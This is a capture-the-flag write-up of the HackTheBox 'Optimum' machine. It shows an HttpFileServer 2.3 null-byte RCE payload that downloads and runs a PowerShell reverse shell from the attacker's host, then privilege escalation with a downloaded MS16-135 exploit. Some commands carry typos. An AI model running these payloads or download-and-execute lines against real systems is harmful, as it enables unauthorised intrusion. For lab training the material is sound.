HackTheBox — Optimum

Shellbr3ak
4 min readFeb 24, 2020

--

Hey guys, what’s going on, this is shellbreak and we’ll be doing optimum from Hackthebox which is rated as easy.

The Idea of the box is an HTTPFileServer that has a RCE vulnerability which we’ll be using to get a shell on the box, once we get a shell on the box, then for the privesc we’ll use a powershell script called Sherlock.ps1 to enumerate the box locally and get a root shell.

So, enough talking and let’s jump in.

As always we’ll start with nmap scanning:

nmap -sC -sV -oA nmap/optimum 10.10.10.8

As you can see we have one port open which is 80, and its banner is telling us that it’s HttpFileServer version 2.3.

After google’ing around, I found that this server has a RCE vulnerability,

check this URL to read more about it:

https://www.kb.cert.org/vuls/id/251276/

Web Enumeration:

http://10.10.10.8

The idea of the vulnerability is that the search feature in the app fails to handle null bytes.

The input in the search feature is filtered with a regex, so using a null byte we can terminate the regex string and then insert the command we want.

While google’ing for CVEs I saw that the server has a special scripting language (HFS scripting) using which we’ll execute our commands on the box.
See this page if you like to have an idea about the scripting language:

https://webcache.googleusercontent.com/search?q=cache:JhOwBxwMYqYJ:https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands+&cd=1&hl=en&ct=clnk&gl=tr&client=firefox-b-d

we’ll be using “exec” function to execute commands:

{.exec|command.}

Exploitation:

Using burp to intercept the request (after submitting our input inside search box)

Now since the box is 64-bit I’ll use a 64-bit powershell to upload my shell.

you can get the script that I’ll be using from this github repo:

https://github.com/samratashok/nishang

I’m going to use Invoke-PowerShellTcp.ps1 script, but before that we have to edit the script and add to invoke the right function and add our ip address:

copy this line and add it to the end of the script:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 1234

Note: run python simple http server so you can download on the box.

the payload should look like:

%00{.exec|c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.34:8000/Invoke-PowerShellTcp.ps1.}

Now on burp:

Don’t forget to set your netcat listener on port 1234.

And we got a user shell:

Now let’s upload Sherlock script to enumerate the box and see if we’ll get anything.

you cat get the script from this repo:

https://github.com/sherlock-project/sherlock

Note: you need to invoke the function you want to execute in the end of sherlock script (In my case it’s Find-AllVulns).

Now download the script on the box:

And we can see that the server is vulnerable to MS16–135, so let’s get the exploit and see if it’s going to work.

Download the exploit from this URL:

https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-135/MS16-135.ps1

Now let’s download the script on the box:

IEX(Net-Object Net.WebClient).downloadString(‘http://10.10.14.34:8000/ms16–135.ps1’)

And indeed we got root on the box.

So, this is how we own root on Optimum box, I hope you guys enjoyed it and I’ll see you all in the next write-up.

--

--

Shellbr3ak

Offensive Security Engineer | Threat Intelligence Analyst | Cloud/Web App Penetration Tester | CTIA | eWPTXv2 | OSWE | CTF Lover